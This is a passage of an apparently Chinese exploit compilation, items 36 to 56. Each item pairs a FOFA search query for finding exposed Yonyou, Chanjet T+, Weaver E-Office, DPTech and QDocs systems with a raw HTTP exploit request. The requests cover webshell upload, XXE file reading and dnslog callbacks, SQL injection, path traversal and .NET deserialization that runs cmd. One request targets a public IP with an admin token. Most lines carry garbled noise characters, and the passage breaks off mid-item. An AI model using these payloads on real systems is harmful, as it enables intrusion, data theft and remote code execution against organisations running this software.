POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
+ G( v6 F( H; H0 I" q, @Host: 203.25.218.166:8888+ Y: i' D5 q) N+ h
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info- R) T& F7 Q+ B; I% |7 c; V
Accept-Encoding: gzip, deflate$ {3 b/ v2 f; R; @2 w0 T+ c, U5 Q( k2 K
Accept: */*
6 O2 N5 Q2 m7 f) ?Connection: close; B; h7 o- V0 _! s$ }$ q8 o
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
' f# \/ p/ N/ ]4 E/ B5 o2 x& `Content-Length: 190
9 M% I. C" m6 @* d% m, k# w4 f" zContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
1 O- \& a" t. Z
! T. ?5 V9 N6 f5 |( d--fd28cb44e829ed1c197ec3bc71748df0 `$ U2 e# b/ j" Y
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
/ X7 c2 I0 y7 {: i' [9 |* i) x+ q9 F) j4 b' a ~$ M
<%out.println(1111*1111);%>
3 `3 B, J8 D3 |# ?8 A--fd28cb44e829ed1c197ec3bc71748df0--: L8 g Y- r$ `1 Y# Q. o
/ P7 _7 _& x+ g( ^+ {6 R
1 A9 f+ o0 |, a$ v- r1 p
36. 用友NC-Cloud soapFormat XXE
9 h0 k! f2 P8 X; D# YFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
! @( s5 }% Y/ T: e [" y7 Z" Y7 xPOST /uapws/soapFormat.ajax HTTP/1.1$ E! f& d/ m3 z' w
Host: 192.168.40.130:8989
2 K, m$ D3 f x8 d8 v! H1 K# QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0* ], V4 m; f0 e3 g6 D- o# s7 p0 ]
Content-Length: 263
& H& L* [" D/ t0 a: d. P& c) Y5 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 A% I* H5 l; y
Accept-Encoding: gzip, deflate5 n; }/ A1 x# M4 \+ V! u) F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 n: @# a) h" J( }
Connection: close
" g9 g8 f* K# {/ {Content-Type: application/x-www-form-urlencoded; v6 U/ W# Z+ Z( T/ z: t3 }
Upgrade-Insecure-Requests: 1
' ]3 Z' s6 F7 b: @9 O
1 o2 x" B& G3 i; T( A, @: Ymsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a8 _- c5 k# d5 ~5 f
7 R* ~) q! f9 }! ?& X0 A
- R/ P% J& [) |37. 用友NC-Cloud IUpdateService XXE
6 K$ Y# K+ \9 [1 G* B* ?# z- ~% V9 wFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"* [6 }& W( D# C" O
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
1 i) a ?3 } M# W, t4 S! hHost: 192.168.40.130:8989
! i4 q7 d0 o$ B, J( R" A* H. ~. d bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.360 R- k( F& N: R4 `
Content-Length: 421
: B; p7 h% N, c( x" v" _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- I3 F/ s% @. {% X' J0 C5 \1 X; LAccept-Encoding: gzip, deflate
0 J& h5 F/ h0 I: w$ ]! }Accept-Language: zh-CN,zh;q=0.91 ?9 }7 S* I: X
Connection: close
, N& P R/ |/ _% i5 P" g$ ~$ S) DContent-Type: text/xml;charset=UTF-8
' q4 _9 G0 A& b; H+ ^/ Y" |SOAPAction: urn:getResult# g+ T) d& z* @ n
Upgrade-Insecure-Requests: 1
u" H& k" v- `# X: s
4 j- r' E5 q. m) b- X) \- v$ @0 p' P<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
9 Z9 R H: e1 B* M: [<soapenv:Header/>
" H8 G' f% E- A<soapenv:Body>
& P2 W' r0 {6 Q1 G<iup:getResult># h4 B- U2 q3 g1 q
<!--type: string-->
/ k& {* `+ ~+ _0 t<iup:string><![CDATA[. s4 h8 k; \# b- r
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>* e) |4 v, t5 Z' D. u* ] V& F" d4 c
<xxx/>]]></iup:string>& I; B% y6 I; N) T/ f
</iup:getResult>- X' T( Y; x: P% `
</soapenv:Body>
. }2 v( |5 @/ V- y$ ]2 n</soapenv:Envelope>
4 w1 c: Q" w. O& q4 B- e
4 C5 l& v5 W+ K" b% H, _$ p7 v# C6 q
7 c3 ~& |/ F; t% Z/ A
38. 用友U8 Cloud smartweb2.RPC.d XXE4 H1 b/ ~; B3 F3 Y1 b
FOFA:app="用友-U8-Cloud"
% G) P3 @: c4 t, P/ a% |POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
2 l; P. \! w' i0 qHost: 192.168.40.131:8088+ a: x! x! b N9 P9 s' w1 D% a% a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25' p& Z i, ~; s \ f: P
Content-Length: 2601 O' e: d( y7 `. r) w7 ?2 p: ?& `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3( `6 V1 _; q) V& z- Y0 v$ ~) I I, u
Accept-Encoding: gzip, deflate6 [4 r, s0 {- O# y* v+ M! r+ `, H1 n( s( u
Accept-Language: zh-CN,zh;q=0.9
) u- R6 B6 M7 n* @% aConnection: close
$ m, v5 h9 p9 U* A+ V6 KContent-Type: application/x-www-form-urlencoded
; N. W1 I) H: \( _( A+ G& b) E( g9 k* m5 ?) u$ C4 V) C6 J) {+ ?
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>% W ? _3 y; m# F" B S
# ^( ^+ u9 c* l* ~& L0 n9 M) l3 {/ Y- [' w- m% s3 H( {
39. 用友U8 Cloud RegisterServlet SQL注入; S4 D4 {" i- V
FOFA:title="u8c"3 `! v# X3 l+ M$ h; g5 ^1 d
POST /servlet/RegisterServlet HTTP/1.1( b' l( G; n/ ]% ^' ^! T9 n
Host: 192.168.86.128:8089& A5 D( X) \/ f1 n. t5 i2 e7 C0 n) ]. ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& a. G% J1 r! i0 Q9 b
Connection: close4 H K; T9 N2 C; V; }
Content-Length: 85
3 e y. t- F' t( G" ?, fAccept: */*
! J, I% {9 Z2 K8 H0 X: F" cAccept-Language: en3 q1 w Q- f8 M4 e1 n3 B6 X
Content-Type: application/x-www-form-urlencoded
( K$ Z% K: B, Q( H; ~3 MX-Forwarded-For: 127.0.0.1
2 a3 d) A6 E1 N# L- M+ j6 g0 r. vAccept-Encoding: gzip' a4 ~$ a7 s9 Z8 i! D
- }- ~0 A4 E( v" r H$ N
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
* Q! l! t6 g7 W7 H+ l* j6 x
, f# q1 H% y0 U" y$ |3 x
: y, c G F" L; _5 B: S40. 用友U8-Cloud XChangeServlet XXE
* a8 M+ F; {! `8 {) A4 r! b/ ]FOFA:app="用友-U8-Cloud"
0 U; n2 Z; _( h$ Y; b, J* QPOST /service/XChangeServlet HTTP/1.1
3 n* ]+ W: m+ Q! ~9 E+ PHost: x.x.x.x0 F9 W" E T3 g, }$ X8 u2 l
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 @+ z8 V' t" j: v9 @$ _- ZContent-Type: text/xml5 v1 C" K+ E- e% ^' R
Connection: close
) t! X3 m: z( y: I9 t+ T! N5 ~0 Z8 L
' U4 ~# h$ O5 u; x' t<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
# u, |4 R5 F6 W3 X2 b
4 C4 ^" C0 p& h! S4 z4 i2 m! s7 X; X5 c* S5 \& d3 _. a# x
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
5 N; z7 I2 H6 J. G+ n0 cFOFA:app="用友-U8-Cloud"
/ h/ D- h! I9 H# J \5 j% k: SGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1& Q. ^! P, q! G! X' @& s; _ `
Host:
: j1 x) k! c. \$ RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ J/ b: H% o4 B P' \
Content-Type: application/json# `; T' R" n9 y& j/ s9 }
Accept-Encoding: gzip
3 Y" q) @3 J+ }Connection: close
) R# C/ D9 e/ T
B) v: w S- \8 ?3 D, ~
) T2 d) i* Y) H* z$ C42. 用友GRP-U8 SmartUpload01 文件上传8 }$ ^+ h) m8 r9 V
FOFA:app="用友-GRP-U8"
4 L' |( g6 M7 h- [# zPOST /u8qx/SmartUpload01.jsp HTTP/1.1; n( J$ N- b0 h3 n9 [
Host: x.x.x.x
6 k8 A5 O) k3 |7 r3 C# z& l& IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
* A' H+ I% q6 p4 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36/ C w; n( |+ q9 s C
- K4 H$ l- k" i! z: `6 ?/ uPAYLOAD
& ?2 O) ]7 F8 V
/ ~$ q2 l5 @9 P+ @& p) {0 l; g7 X0 @. M5 y
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
7 y3 U0 z3 n1 P; R8 F
4 V5 o( j7 J+ L43. 用友GRP-U8 userInfoWeb SQL注入致RCE
- J+ a# n, U/ b8 C4 KFOFA:app="用友-GRP-U8"
3 D: V, e0 ^2 WPOST /services/userInfoWeb HTTP/1.1, P; d# E! W& V% ^
Host: your-ip
7 b$ r1 w: m, a$ ` m9 A% w5 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36' o3 Q! j+ h4 i% G4 |0 S2 N4 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( W" \) U; a! l% @/ o1 R7 M& t
Accept-Encoding: gzip, deflate
9 {( A; P/ [. J. M+ z! LAccept-Language: zh-CN,zh;q=0.9
, v; V/ v, B% iConnection: close
4 P3 b# ]( H' E- VSOAPAction:
4 g* @$ x; X+ W1 [9 N( E8 |/ C$ IContent-Type: text/xml;charset=UTF-8 N' F% n1 e% @( v, }7 Q! o
7 @ D! x% U8 L; u" e
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
7 [( h- U8 h- `2 F <soapenv:Header/>) s- |/ [2 o- n" \' O# |$ N
<soapenv:Body>. Y! o1 ?$ H7 p: D8 S, m5 R3 V7 `7 |
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"># ]* J/ w9 s+ t. s% [" F
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
% Y6 C: N: L6 i% Z6 L8 i </ser:getUserNameById>" X5 @$ ~ j' v o7 H. E
</soapenv:Body>1 r% ^; }& `. k8 U4 u7 _; l& k
</soapenv:Envelope>
7 d3 J8 l8 s% Q. F, p# `- t( n: s! g9 _! t+ ?6 l/ f( B
" B, _! X% Z2 K! B$ S9 I: a
44. 用友GRP-U8 bx_dj_check.jsp SQL注入- F) A1 U* c7 w' j+ F2 Q; X
FOFA:app="用友-GRP-U8"
9 n4 G& T- E6 B) ~ mGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.16 ]3 k( E" u; L& w
Host: your-ip2 H8 B8 F" M3 ?" p* Z; P3 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
1 W) B/ V4 v9 z# Z" P3 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) i# O: o* ]5 s* i* L' X/ sAccept-Encoding: gzip, deflate, b7 P) S, N9 }# Z& |. m' u: P
Accept-Language: zh-CN,zh;q=0.9% n' `) @! m: s1 K x9 ?! a6 o, P
Connection: close
9 w. }6 _7 S g. q# \
/ y7 g6 S) s$ |. x1 r3 ]5 J. e3 A* a) B! z4 s }( Y; w0 O: w
45. 用友GRP-U8 ufgovbank XXE7 p- Y4 n K: I5 X) e4 A* n1 U& p6 M
FOFA:app="用友-GRP-U8"5 D4 p1 i: N' c2 u
POST /ufgovbank HTTP/1.1+ `! k0 h5 `3 v+ {
Host: 192.168.40.130:2224 L7 ]0 R8 Q* W- t1 y& v# _! a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
* v4 Y4 X8 C2 Y( S KConnection: close6 e5 ~: ]4 U: t6 M4 R+ L2 r
Content-Length: 161- I0 {- q% f) s. [ M: T# `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: a/ d) L F. n R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ c# E( j& ^9 G7 b- IContent-Type: application/x-www-form-urlencoded
$ l5 K, M1 B0 p3 o" JAccept-Encoding: gzip/ R) u ]: V' Z0 q& q- \
2 W, `" B E* ~9 r
reqData=<?xml version="1.0"?>: t+ P, Q* O" c& H: k
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
6 {* V5 I* j- k D) A# @( _7 W+ }* v
u# O# R3 b+ P" G2 g8 c7 i& U& A. ]
46. 用友GRP-U8 sqcxIndex.jsp SQL注入, W! l2 R0 a# T3 a# a3 x. x! ~3 f
FOFA:app="用友-GRP-U8"4 B- A% R: G6 z9 p X$ `
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
7 z1 j' i B+ ]. ~) b$ \Host: your-ip
; w$ L+ C& U4 R& IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 O" P$ e' u. T% B6 |! s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 ~. x9 q! ~: Z P" W6 r1 y6 UAccept-Encoding: gzip, deflate
1 A5 Y: w2 [% [Accept-Language: zh-CN,zh;q=0.9
+ a5 r5 O/ q; m: c2 p* _$ ^" e/ cConnection: close2 N8 g: `& B! q, p, o
1 E0 B. q( Y9 P! Q3 R N; N/ O# H0 v: d% i# Q
47. 用友GRP A++Cloud 政府财务云 任意文件读取
7 H0 c. z! e. O6 {/ A' O( fFOFA:body="/pf/portal/login/css/fonts/style.css"+ X9 u4 {, v3 D1 M* g
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1+ E. h, X3 b, \8 M( z
Host: x.x.x.x# Z3 @9 S- W+ H1 E& |
Cache-Control: max-age=0
9 f* Q( b# ?8 z4 kUpgrade-Insecure-Requests: 1! _8 [2 O6 J! J$ J' ]0 N. M7 h8 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) p5 w6 V5 F: f5 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; u9 z! ~' j3 ^
Accept-Encoding: gzip, deflate, br0 {$ X1 x* i! Q
Accept-Language: zh-CN,zh;q=0.9
. X/ o7 @* j& d+ WIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT$ k0 {! ~9 R# E; T
Connection: close! h8 g# y, `! P
9 I. ]# {6 s6 W
$ q* r5 U4 J) M' r" t4 R( x8 _, K/ o ?. c& l6 \' Y% t
48. 用友U8 CRM swfupload 任意文件上传: e$ A R! w N( J' K
FOFA:title="用友U8CRM"
! [; c, J! G! L/ e0 @0 l* jPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1$ k4 o5 Z4 J: g2 T/ |- T! v
Host: your-ip
/ ^4 d' d* D! ]9 x- I2 I& s# NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 n- \7 c0 u" T s/ n) D! D$ I4 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- g4 w# _4 ]: c& J2 H* B: sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 m9 E* \& ~# b. D, d, g
Accept-Encoding: gzip, deflate! @. B( ]! @! s3 s
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
6 I6 z$ ]& i( z' z------269520967239406871642430066855! a E9 ^4 Q6 _( n4 ]+ {9 q% b' K
Content-Disposition: form-data; name="file"; filename="s.php"# S: h6 s' L) y: v* W3 ]( |1 J; d) c
1231
" d. q. _9 r, A8 w, J% A' ]Content-Type: application/octet-stream
9 D) ?* i% G. K5 t- ]------269520967239406871642430066855
/ N( f9 F8 z3 }2 FContent-Disposition: form-data; name="upload": _# Q+ [% @6 W) f3 r
upload4 B N2 H- ~* j5 G9 ~# M8 J
------269520967239406871642430066855--
% ^. W1 F; Y4 U' P; ~) y% Q7 ~4 I/ R/ e& F. l& U+ {) b
0 B/ \. F. Z/ j/ {, g+ b: K: X
49. 用友U8 CRM系统uploadfile.php接口任意文件上传- O& h3 @9 g0 g! R* H
FOFA:body="用友U8CRM"
I7 ]8 D6 N* q) D8 g2 y6 s. |
- L) E- c. ^& u: `POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
1 n) M" K/ ~& z; L! @Host: x.x.x.x
$ W" i: w& }! s' l3 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ x4 c1 _ Q* T7 a8 d% P2 ~1 r2 E) dContent-Length: 329
- L6 w4 `" Y+ j3 V9 d% q+ I. X! @2 a4 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: H9 f" w5 N$ a1 a& mAccept-Encoding: gzip, deflate
, L; a" T: |6 a3 @( PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" e: ]' L. B% E
Connection: close
& ]; s* K, _, w1 H( i4 eContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w0 ~4 ~$ n% K* R: A4 N ]
. V' `) [2 i7 r
-----------------------------vvv3wdayqv3yppdxvn3w2 z9 c; e9 V; p9 y
Content-Disposition: form-data; name="file"; filename="%s.php ": b- b! X7 T3 O6 U' G3 J2 f
Content-Type: application/octet-stream
. J$ l: D- r0 k8 A' y* e/ ?
1 P' m6 ~+ i2 ~wersqqmlumloqa1 B- ?2 G) t6 v, H- X) w6 r; m6 L
-----------------------------vvv3wdayqv3yppdxvn3w6 `, ^% T; ^& [ u& V; Q" B$ F
Content-Disposition: form-data; name="upload") L/ Z4 S$ l% ~
4 `( o2 c6 h' Rupload
: \# k5 v9 t: z1 }1 n-----------------------------vvv3wdayqv3yppdxvn3w--3 a( U1 F' [. }0 j$ e8 L
5 Z3 D" A6 l* ? h# B) n$ y7 b
2 @9 U7 B) p- k6 J+ j2 Lhttp://x.x.x.x/tmpfile/updB3CB.tmp.php6 O" w3 q& E( _3 s
$ l* M% s& f, ~( c! Z* ~2 o50. QDocs Smart School 6.4.1 filterRecords SQL注入, P: H* ]" o* o+ t: n
FOFA:body="close closebtnmodal"! \6 P3 O) Y5 Q
POST /course/filterRecords/ HTTP/1.1
) p) Y3 Q) j2 G( t: J6 K: w k. S6 oHost: x.x.x.x
0 z8 i+ _+ y+ `* yUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) h1 S- G' S8 s1 }
Connection: close1 U5 D8 F5 o& a1 B+ M% a$ C9 {+ u' j
Content-Length: 2245 d9 ~) g# A+ f4 o( ?
Accept: */*
8 X+ h: ]5 B1 W0 \$ xAccept-Language: en
% d, u+ U7 h4 E9 \8 @7 z- P) xContent-Type: application/x-www-form-urlencoded
9 g, O4 I* d4 U$ NAccept-Encoding: gzip( w. m& F J; ~% u1 F' G: x
$ P) I! @& u$ y4 \searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1 l0 x+ U! w' I; e4 X5 G7 Q
; a! E) B0 ]7 E( u, h
7 o' I* J% M. j1 n9 N, h51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入& L1 D6 l$ i g; ^( [ k+ _
FOFA:app="云时空社会化商业ERP系统"
0 Z4 v* x! E4 ]0 _GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.18 v# q, n4 f' G/ Z3 n8 E, V
Host: your-ip% L& R2 c0 b3 O" i, w
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36, w1 a% _% p8 r4 M1 f2 w# K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) { l6 e0 f- K0 v6 m
Accept-Encoding: gzip, deflate
% u* j. [7 X$ w+ g) W& S3 ?Accept-Language: zh-CN,zh;q=0.9
1 n% g5 @. W8 pConnection: close. v. t1 C8 ?$ ^3 u1 m% u
, |/ a( F0 b( F: K9 X7 F5 L# U/ |: ]# Q
52. 泛微E-Office json_common.php sql注入6 J3 s! Y7 d8 S& x: j8 Z
FOFA:app="泛微-EOffice"
1 Z& c! O" b( @& }9 p% SPOST /building/json_common.php HTTP/1.12 C k* E* B# B8 L+ j
Host: 192.168.86.128:8097. t6 i" N0 `. E9 ^* B/ h
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' q4 D5 \* @0 _
Connection: close
! u; ~& S, t4 d) {9 A9 p) VContent-Length: 87
% {/ B0 ~" J. O# K* a/ sAccept: */*: c( B. k1 ?. R4 m! u) y
Accept-Language: en
8 j [/ l2 i5 `Content-Type: application/x-www-form-urlencoded$ Q, x3 ]! ?2 x7 P8 L) w/ G
Accept-Encoding: gzip: ^* D/ @1 P8 V& ]/ g5 M- P' a4 H
) u- W& a+ p# Qtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
8 v& n b2 g5 r( @. {0 x D! N, @" y/ B0 q: v
* Q/ ^8 K) Z5 `3 C
53. 迪普 DPTech VPN Service 任意文件上传1 j) ]; |0 I. L2 ]/ }9 \
FOFA:app="DPtech-SSLVPN"
' p& k0 d) q0 b5 A2 }# _* T' k: P/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
, t; o# ^2 p: {! n9 B; |3 T
; O1 P! Y$ p' ^, e
* y# w3 f# u/ d( R8 K& M54. 畅捷通T+ getstorewarehousebystore 远程代码执行
; d# e( @4 W1 \* E6 ~! bFOFA:app="畅捷通-TPlus"
3 ? x' k" K4 g; G& F9 l第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
9 x% M& M. P ?$ V"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"* ]( X( }2 s9 F9 j- j; ]9 C
( M4 W: i& I* ~) o
- o, n7 S5 w: P. a% W* w4 [2 n
完整数据包
- b. {, r3 w! L- `3 U- jPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
& C' l# p$ ]/ p) g4 ?, h3 _) O; EHost: x.x.x.x7 {: ^7 h8 I g9 U' j. k' f+ \" f3 t! M) j
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
8 u' Z' T4 @* J" o6 t8 ]$ C! B$ J3 uContent-Length: 593% H# u* u$ X! i
" m2 O0 @! d4 M# \- d{
5 L5 h6 F4 h/ Q' f( z"storeID":{* N4 @4 ]# {+ Q
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 _8 E& P4 c [/ L* i! {/ p
"MethodName":"Start",& g- [' g0 i: w
"ObjectInstance":{
! ~& P- o4 g/ ` @0 S- G "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 [, ]5 G0 C& R3 j2 K3 F3 S
"StartInfo":{
+ ^ H7 `8 k/ v$ @" n "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; ~6 x- i& y% `6 U) E. ~ "FileName":"cmd",; S4 ^. c j; l, u9 R* ~, t
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
B- [: a4 v+ W$ q$ c( a }
5 `, `) y- N9 H; L }
, E, K1 r3 w* d! P3 u7 _' \8 F }/ m. H2 m2 e* G+ V3 a; H
}
4 w+ }, P7 D/ C, g4 o) \; P; m, [! `6 v6 {
, z% `! v7 c5 h2 ]/ I
第二步,访问如下url
; H: F* _) `! Q/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
) |9 F, X1 a& r! G4 y+ o, ]; p3 X( r( \$ G
" ]/ m# H* x& G* P
55. 畅捷通T+ getdecallusers信息泄露
) J% X, D& f @- p+ q5 @8 @* L7 B! }FOFA:app="畅捷通-TPlus"" z. A* y$ `7 Q
第一步,通过
% o/ E0 a& B' i/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
/ c( f& S n3 n- h G8 T第二步,利用获取到的Cookie请求
% f& l0 o2 g+ E1 W# c1 o4 ]/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
. W4 z3 a% D0 b! E
+ C* i; Q" O/ ^56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE, _7 }. ]1 Q3 S. ^5 p
FOFA: app="畅捷通-TPlus"& V) D! Q. C) P2 w1 {: W2 q. G8 D! \
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1( t$ {( [; q9 F1 c) J
Host: x.x.x.x% Z( e" C- x, X' m
